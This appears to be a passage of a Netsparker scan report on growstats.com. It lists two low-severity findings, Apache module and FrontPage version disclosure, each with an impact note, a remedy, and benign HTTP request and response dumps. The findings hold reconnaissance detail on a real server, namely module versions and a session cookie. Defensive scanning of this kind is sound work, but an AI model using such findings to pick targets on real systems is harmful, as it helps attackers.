src="/order/skin1/customer/fixes.js"></script><!--[if lt IE 7 ]><script type="text/javascript" src="/order/skin1/iepngfix.js"></script><![endif]--><!--[if IE ]><script type="text/javascript" src="/order/skin1/iepositioning_fix.js"></script><![endif]--><script type="text/javascript" src="/order/skin1/customer/dropout_buttons_init.js"></script> <link rel="stylesheet" type="text/css" href="/order/skin1/main.css" /> <!--[if lt IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/main.IE6.css" /> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/main.IE7.css" /> <![endif]--><script type="text/javascript"><!--if (/mozilla/.test(navigator.userAgent.toLowerCase()) && !/(compatible|webkit)/.test(navigator.userAgent.toLowerCase())) document.write('<link rel="stylesheet" type="text/css" href="/order/skin1/main.FF.css" />');--></script> <link rel="stylesheet" type="text/css" href="/order/skin1/modules/Advanced_Order_Management/main.css" /> <link rel="stylesheet" type="text/css" href="/order/skin1/modules/RMA/main.css" /> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.css" /> <!--[if lt IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.IE6.css" /> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.IE7.css" /> <![endif]--> <base href="http://growstats.com/order/" /> <script src="/order/skin1/anchor_fix.js" type="text/javascript"></script><script type="text/javascript">var userflyHost = (("https:" == document.location.protocol) ? "https://secure.userfly.com" : "http://asset.userfly.com");document.write(unescape("%3Cscript src='" + userflyHost + "/users/38634/userfly.js' type='text/javascript'%3E%3C/script%3E"));</script></head><body><div id="page-container"> <div id="page-container2"> <div id="content-container"> <div id="content-container2"> <div id="center"> <div id="center-main"> <!-- central space --> <table width="100%"><tr> <td valign="top" align="left"> <div id="location"> <a href="home.php" class="bread-crumb">GrowStats Store</a> <span>/</span> <a href="help.php" class="bread-crumb">Help zone</a> <span>/</span> <font class="bread-crumb last-bread-crumb">Forgot password?</font> </div> </td> <td width="130" valign="top" align="right"> </td></tr></table> <h1>Forgot password?</h1><p class="text-block">You can recover your lost account information using the form below. Please enter your valid email address (the one you used for registration), your account information will be mailed to you shortly.</p><div class="dialog noborder"> <div class="title"> <h2>Forgot password?</h2> </div> <div class="content"> <form action="help.php" method="post" name="processform"> <input type="hidden" name="action" value="recover_password" /> <table cellspacing="0" class="data-table"> <tr> <td class="data-name">Username</td> <td class="data-required">*</td> <td><input type="text" name="username" size="30" value="" /></td> </tr> <tr> <td class="data-name">Email</td> <td class="data-required">*</td> <td> <input type="text" name="email" size="30" value="" /> <div class="error-message">Email address and login name do not match. Please correct.</div> </td> </tr> <tr> <td colspan="2">&nbsp;</td> <td class="button-row"> <button class="button" type="submit" title="Submit"> <span class="button-right"><span class="button-left">Submit</span></span> </button></td> </tr> </table> </form></div></div> <!-- /central space --> </div> </div> <div id="left-bar"> <div class="menu-dialog menu-categories-list"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2>Our Services</h2> </div> <div class="content"> <ul> <li><a href="http://growstats.com/order/Targeted-Traffic" title="Targeted Traffic">Targeted Traffic</a></li><br> <li><a href="http://growstats.com/order/Organic-Traffic" title="Organic Traffic">Organic Traffic</a></li> <img src="/order/skin1/images/new.gif"> </ul> </div></div> <script type="text/javascript" src="/order/skin1/jquery.tooltip.min.js"></script> <div class="menu-dialog menu-minicart empty"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2><span class="minicart"> <span class="empty"> <strong>Cart is empty</strong> </span> </span></h2> </div> <div class="content"> <ul> <li><a href="cart.php">View cart</a></li> <li><a href="cart.php?mode=checkout">Checkout</a></li> <li><a href="orders.php">Orders history</a></li> </ul> </div></div> <div class="menu-dialog menu-auth"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2>Your account</h2> </div> <div class="content"> <form action="http://growstats.com/order/include/login.php" method="post" name="authform" class="item"> <input type="hidden" name="xid" value="5a247fca79b14ddec1620b1efdf933b3" /> <input type="hidden" name="mode" value="login" /> <input type="hidden" name="usertype" value="C" /> <input type="hidden" name="redirect" value="customer" /><b>Register today for faster ordering, order history, discounts, and more!</b><br /><br /> Username<br /> <input type="text" name="username" size="17" value="" /><br /> Password<br /> <input type="password" name="password" size="17" maxlength="64" value="" /> <div class="login-buttons"> <button class="button menu-button" type="submit" title="Log in"> <span class="button-right"><span class="button-left">Log in</span></span> </button> <div class="button menu-button" title="Register" onclick="javascript: self.location = 'register.php'; if (event) event.cancelBubble = true;"> <a href="register.php" onclick="javascript: if (event) event.cancelBubble = true;">Register</a> </div> <div class="clearing"></div> </div> <div class="recovery"> <a href="help.php?section=Password_Recovery">Forgot password?</a> </div> </form> </div></div> <div align="center"><a href="//privacy-policy.truste.com/click-to-verify/www.growstats.com" target="_blank"><img style="border: none" alt="Privacy-Policy-By-TRUSTe" src="//privacy-policy.truste.com/verified-seal/www.growstats.com/green/h.png"/></a></div> </div> </div> </div> <div class="clearing">&nbsp;</div> <div id="header"> <table width="100%" height="132" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="72" valign="top" bgcolor="#FFFFFF" class="box_title" td><div align="center"> <table width="780" height="72" border="0" cellpadding="2" cellspacing="0"> <tr> <td width="215" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="left"><img src="/order/skin1/images/logo2.gif" width="210" height="68"></div></td> <td width="392" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="right" class="font2"><strong>&quot;<em>Boost your website traffic</em>&quot;</strong> </div></td> <td width="161" height="72" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="right" class="font2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="center"><img src="/order/skin1/images/chatlive.gif" border="0" onClick="javascript:window.open('http://a2.websitealive.com/1884/rRouter.asp?groupid=1884&departmentid=0&websiteid=0','guest','width=575,height=490');" style="cursor:pointer"></td> </tr> </table> </div></td> </tr> </table> </div></td> </tr> <tr> <td height="27" valign="top" background="/order/skin1/images/menubg2.gif" class="box_title" td><table width="100%" height="27" border="0" cellspacing="0"> <tr> <td height="20" colspan="3" valign="middle" class="box_title" td><div align="center"> <table width="780" height="27" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="20" colspan="3" valign="middle" class="box_title" td><div align="left"><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><strong><a href="http://www.growstats.com/index.php" class="top_menu">Home</a></strong></span></font></span><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/howitworks.php" class="top_menu">How It Works</a></span></font><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/services.php" class="top_menu">Services</a></span></font></span></strong><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><strong><span class="font4"><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://growstats.com/order" class="top_menu"><strong>Order Now</strong></a></span></font></span></span></strong></span></strong><strong><span class="font4"><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/testimonials.php" class="top_menu">Testimonials</a></span></font></span></strong></span></strong></span></strong><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font si..
Apache Module Version Disclosure

Apache Module Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /order/help.php

/order/help.php

http://growstats.com/order/help.php?section=Password_Recovery_error&username=&email=

Extracted Version

mod_bwlimited/1.4 FrontPage/5.0.2.2635

Request

GET /order/help.php?section=Password_Recovery_error&username=&email= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: growstats.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 20 Jun 2011 11:22:42 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NON CURa ADMa DEVa TAIa CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: xid=e1122c4926a13eefebb7928028774d42; path=/order; domain=growstats.com; httponly,RefererCookie=deleted; expires=Sun, 20-Jun-2010 11:22:41 GMT; path=/order; domain=growstats.com; httponly,store_language=en; expires=Tue, 19-Jun-2012 11:22:42 GMT; path=/order; domain=growstats.com; httponly
Last-Modified: Mon, 20 Jun 2011 11:22:42 GMT
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1


<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Forgot password? :: Help zone :: GrowStats Store</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta http-equiv="Content-Script-Type" content="text/javascript" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Language" content="en" /> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <meta name="description" content="Buy traffic for your website. Send up to 250,000 unique visitors to your site. The easiest and most reliable way to bring visitors to your website." /> <meta name="keywords" content="buy traffic, boost traffic, get visitors, website visitors, website hits, buy visitors, buy hits, get traffic, improve traffic, improve visitors, how to get visitors, website traffic" /> <script type="text/javascript"><!--var number_format_dec = '.';var number_format_th = ' ';var number_format_point = '2';var store_language = 'en';var xcart_web_dir = "/order";var images_dir = "/order/skin1/images";var lbl_no_items_have_been_selected = 'No items have been selected';var current_area = 'C';var currency_format = "$x";var lbl_product_minquantity_error = "Sorry, the minimum order quantity for this product is {{min}}.";var lbl_product_maxquantity_error = "Sorry, the maximum order quantity for this product is {{max}}.";var lbl_product_quantity_type_error = "You can specify a number from <span class=\"min-quantity\">{{min}}<\/span> to <span class=\"max-quantity\">{{max}}<\/span>.";var is_limit = false;--> </script> <script type="text/javascript" src="/order/skin1/common.js"></script> <script type="text/javascript" src="/order/skin1/browser_identificator.js"></script> <script type="text/javascript" src="/order/skin1/jquery-min.js"></script> <script type="text/javascript" src="/order/skin1/jquery-fix.js"></script> <script type="text/javascript" src="/order/skin1/ajax.js"></script> <script type="text/javascript" src="/order/skin1/customer/fixes.js"></script><!--[if lt IE 7 ]><script type="text/javascript" src="/order/skin1/iepngfix.js"></script><![endif]--><!--[if IE ]><script type="text/javascript" src="/order/skin1/iepositioning_fix.js"></script><![endif]--><script type="text/javascript" src="/order/skin1/customer/dropout_buttons_init.js"></script> <link rel="stylesheet" type="text/css" href="/order/skin1/main.css" /> <!--[if lt IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/main.IE6.css" /> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/main.IE7.css" /> <![endif]--><script type="text/javascript"><!--if (/mozilla/.test(navigator.userAgent.toLowerCase()) && !/(compatible|webkit)/.test(navigator.userAgent.toLowerCase())) document.write('<link rel="stylesheet" type="text/css" href="/order/skin1/main.FF.css" />');--></script> <link rel="stylesheet" type="text/css" href="/order/skin1/modules/Advanced_Order_Management/main.css" /> <link rel="stylesheet" type="text/css" href="/order/skin1/modules/RMA/main.css" /> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.css" /> <!--[if lt IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.IE6.css" /> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.IE7.css" /> <![endif]--> <base href="http://growstats.com/order/" /> <script src="/order/skin1/anchor_fix.js" type="text/javascript"></script><script type="text/javascript">var userflyHost = (("https:" == document.location.protocol) ? "https://secure.userfly.com" : "http://asset.userfly.com");document.write(unescape("%3Cscript src='" + userflyHost + "/users/38634/userfly.js' type='text/javascript'%3E%3C/script%3E"));</script></head><body><div id="page-container"> <div id="page-container2"> <div id="content-container"> <div id="content-container2"> <div id="center"> <div id="center-main"> <!-- central space --> <table width="100%"><tr> <td valign="top" align="left"> <div id="location"> <a href="home.php" class="bread-crumb">GrowStats Store</a> <span>/</span> <a href="help.php" class="bread-crumb">Help zone</a> <span>/</span> <font class="bread-crumb last-bread-crumb">Forgot password?</font> </div> </td> <td width="130" valign="top" align="right"> </td></tr></table> <h1>Forgot password?</h1><p class="text-block">You can recover your lost account information using the form below. Please enter your valid email address (the one you used for registration), your account information will be mailed to you shortly.</p><div class="dialog noborder"> <div class="title"> <h2>Forgot password?</h2> </div> <div class="content"> <form action="help.php" method="post" name="processform"> <input type="hidden" name="action" value="recover_password" /> <table cellspacing="0" class="data-table"> <tr> <td class="data-name">Username</td> <td class="data-required">*</td> <td><input type="text" name="username" size="30" value="" /></td> </tr> <tr> <td class="data-name">Email</td> <td class="data-required">*</td> <td> <input type="text" name="email" size="30" value="" /> <div class="error-message">Email address and login name do not match. Please correct.</div> </td> </tr> <tr> <td colspan="2">&nbsp;</td> <td class="button-row"> <button class="button" type="submit" title="Submit"> <span class="button-right"><span class="button-left">Submit</span></span> </button></td> </tr> </table> </form></div></div> <!-- /central space --> </div> </div> <div id="left-bar"> <div class="menu-dialog menu-categories-list"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2>Our Services</h2> </div> <div class="content"> <ul> <li><a href="http://growstats.com/order/Targeted-Traffic" title="Targeted Traffic">Targeted Traffic</a></li><br> <li><a href="http://growstats.com/order/Organic-Traffic" title="Organic Traffic">Organic Traffic</a></li> <img src="/order/skin1/images/new.gif"> </ul> </div></div> <script type="text/javascript" src="/order/skin1/jquery.tooltip.min.js"></script> <div class="menu-dialog menu-minicart empty"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2><span class="minicart"> <span class="empty"> <strong>Cart is empty</strong> </span> </span></h2> </div> <div class="content"> <ul> <li><a href="cart.php">View cart</a></li> <li><a href="cart.php?mode=checkout">Checkout</a></li> <li><a href="orders.php">Orders history</a></li> </ul> </div></div> <div class="menu-dialog menu-auth"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2>Your account</h2> </div> <div class="content"> <form action="http://growstats.com/order/include/login.php" method="post" name="authform" class="item"> <input type="hidden" name="xid" value="e1122c4926a13eefebb7928028774d42" /> <input type="hidden" name="mode" value="login" /> <input type="hidden" name="usertype" value="C" /> <input type="hidden" name="redirect" value="customer" /><b>Register today for faster ordering, order history, discounts, and more!</b><br /><br /> Username<br /> <input type="text" name="username" size="17" value="" /><br /> Password<br /> <input type="password" name="password" size="17" maxlength="64" value="" /> <div class="login-buttons"> <button class="button menu-button" type="submit" title="Log in"> <span class="button-right"><span class="button-left">Log in</span></span> </button> <div class="button menu-button" title="Register" onclick="javascript: self.location = 'register.php'; if (event) event.cancelBubble = true;"> <a href="register.php" onclick="javascript: if (event) event.cancelBubble = true;">Register</a> </div> <div class="clearing"></div> </div> <div class="recovery"> <a href="help.php?section=Password_Recovery">Forgot password?</a> </div> </form> </div></div> <div align="center"><a href="//privacy-policy.truste.com/click-to-verify/www.growstats.com" target="_blank"><img style="border: none" alt="Privacy-Policy-By-TRUSTe" src="//privacy-policy.truste.com/verified-seal/www.growstats.com/green/h.png"/></a></div> </div> </div> </div> <div class="clearing">&nbsp;</div> <div id="header"> <table width="100%" height="132" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="72" valign="top" bgcolor="#FFFFFF" class="box_title" td><div align="center"> <table width="780" height="72" border="0" cellpadding="2" cellspacing="0"> <tr> <td width="215" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="left"><img src="/order/skin1/images/logo2.gif" width="210" height="68"></div></td> <td width="392" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="right" class="font2"><strong>&quot;<em>Boost your website traffic</em>&quot;</strong> </div></td> <td width="161" height="72" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="right" class="font2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="center"><img src="/order/skin1/images/chatlive.gif" border="0" onClick="javascript:window.open('http://a2.websitealive.com/1884/rRouter.asp?groupid=1884&departmentid=0&websiteid=0','guest','width=575,height=490');" style="cursor:pointer"></td> </tr> </table> </div></td> </tr> </table> </div></td> </tr> <tr> <td height="27" valign="top" background="/order/skin1/images/menubg2.gif" class="box_title" td><table width="100%" height="27" border="0" cellspacing="0"> <tr> <td height="20" colspan="3" valign="middle" class="box_title" td><div align="center"> <table width="780" height="27" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="20" colspan="3" valign="middle" class="box_title" td><div align="left"><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><strong><a href="http://www.growstats.com/index.php" class="top_menu">Home</a></strong></span></font></span><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/howitworks.php" class="top_menu">How It Works</a></span></font><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/services.php" class="top_menu">Services</a></span></font></span></strong><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><strong><span class="font4"><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://growstats.com/order" class="top_menu"><strong>Order Now</strong></a></span></font></span></span></strong></span></strong><strong><span class="font4"><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font size="3" face="Calibri"><img src="/order/skin1/images/menudiv2.gif" width="14" height="15" align="absmiddle"></font></span></font><strong><span class="font4"><font color="#FFFFFF"><span class="linkheader2"><a href="http://www.growstats.com/testimonials.php" class="top_menu">Testimonials</a></span></font></span></strong></span></strong></span></strong><font color="#FFFFFF" size="2" face="Arial, Helvetica, sans-serif"><span class="linkheader2"><font si..
Frontpage Version Disclosure

Frontpage Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the FrontPage version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from headers of its HTTP response.
- /order/help.php

/order/help.php

http://growstats.com/order/help.php?section=Password_Recovery_error&username=&email=

Extracted Version

FrontPage/5.0.2.2635

Request

GET /order/help.php?section=Password_Recovery_error&username=&email= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: growstats.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 20 Jun 2011 11:22:42 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NON CURa ADMa DEVa TAIa CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: xid=e1122c4926a13eefebb7928028774d42; path=/order; domain=growstats.com; httponly,RefererCookie=deleted; expires=Sun, 20-Jun-2010 11:22:41 GMT; path=/order; domain=growstats.com; httponly,store_language=en; expires=Tue, 19-Jun-2012 11:22:42 GMT; path=/order; domain=growstats.com; httponly
Last-Modified: Mon, 20 Jun 2011 11:22:42 GMT
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1


<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Forgot password? :: Help zone :: GrowStats Store</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta http-equiv="Content-Script-Type" content="text/javascript" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <meta http-equiv="Content-Language" content="en" /> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <meta name="description" content="Buy traffic for your website. Send up to 250,000 unique visitors to your site. The easiest and most reliable way to bring visitors to your website." /> <meta name="keywords" content="buy traffic, boost traffic, get visitors, website visitors, website hits, buy visitors, buy hits, get traffic, improve traffic, improve visitors, how to get visitors, website traffic" /> <script type="text/javascript"><!--var number_format_dec = '.';var number_format_th = ' ';var number_format_point = '2';var store_language = 'en';var xcart_web_dir = "/order";var images_dir = "/order/skin1/images";var lbl_no_items_have_been_selected = 'No items have been selected';var current_area = 'C';var currency_format = "$x";var lbl_product_minquantity_error = "Sorry, the minimum order quantity for this product is {{min}}.";var lbl_product_maxquantity_error = "Sorry, the maximum order quantity for this product is {{max}}.";var lbl_product_quantity_type_error = "You can specify a number from <span class=\"min-quantity\">{{min}}<\/span> to <span class=\"max-quantity\">{{max}}<\/span>.";var is_limit = false;--> </script> <script type="text/javascript" src="/order/skin1/common.js"></script> <script type="text/javascript" src="/order/skin1/browser_identificator.js"></script> <script type="text/javascript" src="/order/skin1/jquery-min.js"></script> <script type="text/javascript" src="/order/skin1/jquery-fix.js"></script> <script type="text/javascript" src="/order/skin1/ajax.js"></script> <script type="text/javascript" src="/order/skin1/customer/fixes.js"></script><!--[if lt IE 7 ]><script type="text/javascript" src="/order/skin1/iepngfix.js"></script><![endif]--><!--[if IE ]><script type="text/javascript" src="/order/skin1/iepositioning_fix.js"></script><![endif]--><script type="text/javascript" src="/order/skin1/customer/dropout_buttons_init.js"></script> <link rel="stylesheet" type="text/css" href="/order/skin1/main.css" /> <!--[if lt IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/main.IE6.css" /> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/main.IE7.css" /> <![endif]--><script type="text/javascript"><!--if (/mozilla/.test(navigator.userAgent.toLowerCase()) && !/(compatible|webkit)/.test(navigator.userAgent.toLowerCase())) document.write('<link rel="stylesheet" type="text/css" href="/order/skin1/main.FF.css" />');--></script> <link rel="stylesheet" type="text/css" href="/order/skin1/modules/Advanced_Order_Management/main.css" /> <link rel="stylesheet" type="text/css" href="/order/skin1/modules/RMA/main.css" /> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.css" /> <!--[if lt IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.IE6.css" /> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="/order/skin1/altskin.IE7.css" /> <![endif]--> <base href="http://growstats.com/order/" /> <script src="/order/skin1/anchor_fix.js" type="text/javascript"></script><script type="text/javascript">var userflyHost = (("https:" == document.location.protocol) ? "https://secure.userfly.com" : "http://asset.userfly.com");document.write(unescape("%3Cscript src='" + userflyHost + "/users/38634/userfly.js' type='text/javascript'%3E%3C/script%3E"));</script></head><body><div id="page-container"> <div id="page-container2"> <div id="content-container"> <div id="content-container2"> <div id="center"> <div id="center-main"> <!-- central space --> <table width="100%"><tr> <td valign="top" align="left"> <div id="location"> <a href="home.php" class="bread-crumb">GrowStats Store</a> <span>/</span> <a href="help.php" class="bread-crumb">Help zone</a> <span>/</span> <font class="bread-crumb last-bread-crumb">Forgot password?</font> </div> </td> <td width="130" valign="top" align="right"> </td></tr></table> <h1>Forgot password?</h1><p class="text-block">You can recover your lost account information using the form below. Please enter your valid email address (the one you used for registration), your account information will be mailed to you shortly.</p><div class="dialog noborder"> <div class="title"> <h2>Forgot password?</h2> </div> <div class="content"> <form action="help.php" method="post" name="processform"> <input type="hidden" name="action" value="recover_password" /> <table cellspacing="0" class="data-table"> <tr> <td class="data-name">Username</td> <td class="data-required">*</td> <td><input type="text" name="username" size="30" value="" /></td> </tr> <tr> <td class="data-name">Email</td> <td class="data-required">*</td> <td> <input type="text" name="email" size="30" value="" /> <div class="error-message">Email address and login name do not match. Please correct.</div> </td> </tr> <tr> <td colspan="2">&nbsp;</td> <td class="button-row"> <button class="button" type="submit" title="Submit"> <span class="button-right"><span class="button-left">Submit</span></span> </button></td> </tr> </table> </form></div></div> <!-- /central space --> </div> </div> <div id="left-bar"> <div class="menu-dialog menu-categories-list"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2>Our Services</h2> </div> <div class="content"> <ul> <li><a href="http://growstats.com/order/Targeted-Traffic" title="Targeted Traffic">Targeted Traffic</a></li><br> <li><a href="http://growstats.com/order/Organic-Traffic" title="Organic Traffic">Organic Traffic</a></li> <img src="/order/skin1/images/new.gif"> </ul> </div></div> <script type="text/javascript" src="/order/skin1/jquery.tooltip.min.js"></script> <div class="menu-dialog menu-minicart empty"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2><span class="minicart"> <span class="empty"> <strong>Cart is empty</strong> </span> </span></h2> </div> <div class="content"> <ul> <li><a href="cart.php">View cart</a></li> <li><a href="cart.php?mode=checkout">Checkout</a></li> <li><a href="orders.php">Orders history</a></li> </ul> </div></div> <div class="menu-dialog menu-auth"> <div class="title-bar valign-middle"> <img class="icon ajax-minicart-icon" src="/order/skin1/images/spacer.gif" alt="" /><h2>Your account</h2> </div> <div class="content"> <form action="http://growstats.com/order/include/login.php" method="post" name="authform" class="item"> <input type="hidden" name="xid" value="e1122c4926a13eefebb7928028774d42" /> <input type="hidden" name="mode" value="login" /> <input type="hidden" name="usertype" value="C" /> <input type="hidden" name="redirect" value="customer" /><b>Register today for faster ordering, order history, discounts, and more!</b><br /><br /> Username<br /> <input type="text" name="username" size="17" value="" /><br /> Password<br /> <input type="password" name="password" size="17" maxlength="64" value="" /> <div class="login-buttons"> <button class="button menu-button" type="submit" title="Log in"> <span class="button-right"><span class="button-left">Log in</span></span> </button> <div class="button menu-button" title="Register" onclick="javascript: self.location = 'register.php'; if (event) event.cancelBubble = true;"> <a href="register.php" onclick="javascript: if (event) event.cancelBubble = true;">Register</a> </div> <div class="clearing"></div> </div> <div class="recovery"> <a href="help.php?section=Password_Recovery">Forgot password?</a> </div> </form> </div></div> <div align="center"><a href="//privacy-policy.truste.com/click-to-verify/www.growstats.com" target="_blank"><img style="border: none" alt="Privacy-Policy-By-TRUSTe" src="//privacy-policy.truste.com/verified-seal/www.growstats.com/green/h.png"/></a></div> </div> </div> </div> <div class="clearing">&nbsp;</div> <div id="header"> <table width="100%" height="132" border="0" cellpadding="0" cellspacing="0"> <tr> <td height="72" valign="top" bgcolor="#FFFFFF" class="box_title" td><div align="center"> <table width="780" height="72" border="0" cellpadding="2" cellspacing="0"> <tr> <td width="215" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="left"><img src="/order/skin1/images/logo2.gif" width="210" height="68"></div></td> <td width="392" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="right" class="font2"><strong>&quot;<em>Boost your website traffic</em>&quot;</strong> </div></td> <td width="161" height="72" valign="middle" bgcolor="#FFFFFF" class="box_title" td><div align="right" class="font2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="center"><img src="/order/skin1/images/chatlive.gif" border="0" onClick="javascript:window.open('http://a2.websitealive.com/1884/rRouter.asp?groupid=1884&departmentid=0&websiteid=0','guest','width=575,height=490');" style="cursor:pointer"></td> </tr> </table> </div></td> </tr> </table> </div></td> </tr> <tr> <td height="27" valign="top" background="/order/skin1/images/menubg2.gif" class="box_title" td><table width="100%" height="27" border="0" cellspacing="0"> <tr> <td height="20" colspan="3" valign="middle" class="box_title" td><div 